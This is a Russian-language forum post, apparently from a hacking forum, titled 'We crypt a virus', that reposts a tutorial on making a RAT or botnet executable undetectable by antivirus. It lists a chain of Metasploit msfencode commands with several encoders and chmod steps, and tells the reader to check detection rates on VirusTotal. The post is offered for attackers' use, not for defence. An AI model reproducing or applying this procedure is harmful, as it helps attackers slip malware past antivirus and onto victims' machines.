• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

Криптуем вирус

  • Автор темы Amazon
  • Дата начала
  • Ответы 0
  • Просмотры 4K

Amazon

Модератор
Команда форума
Регистрация
31.03.18
Веб-сайт
forumteam.bet
Сразу говорю урок не мой указал бы источник но его уже не существует но может кому пригодится
Что нам необходимо:

1. Backtrack ОС
2. MSF encoders

Итак, наш первый шаг - создать вирусный файл с помощью любого из таких инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully Undetectable), мы используем backtrack. Прежде чем отправляться в FUD, проверьте файл на virustotal.com, и мы получим коэффициент обнаружения, например, скажем, 30/44

Теперь запустите терминал в Backtrack и перейдите в каталог, в котором находится ваш файл.

E.g. cd Desktop


Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту команду:

root@bt:~/Desktop# chmod 775 stub.exe

Далее введите эту команду для кодирования вашего вируса:

root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10

Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали его 10 раз с “x86/shikata_ga_nai” encoder.

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 server2.exe

Теперь, 2-й раз, мы используем другой кодировщик с именем

«jmp_call_additive» root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 server3.exe

Теперь снова мы используем другой кодировщик, названный так:

“call4_dword_xor” root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1


Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 server4.exe

Теперь мы окончательно кодируем этот кодировщик “shikata_ga_nai"

root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 final.exe

Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы увидите результаты.
 
Сверху Снизу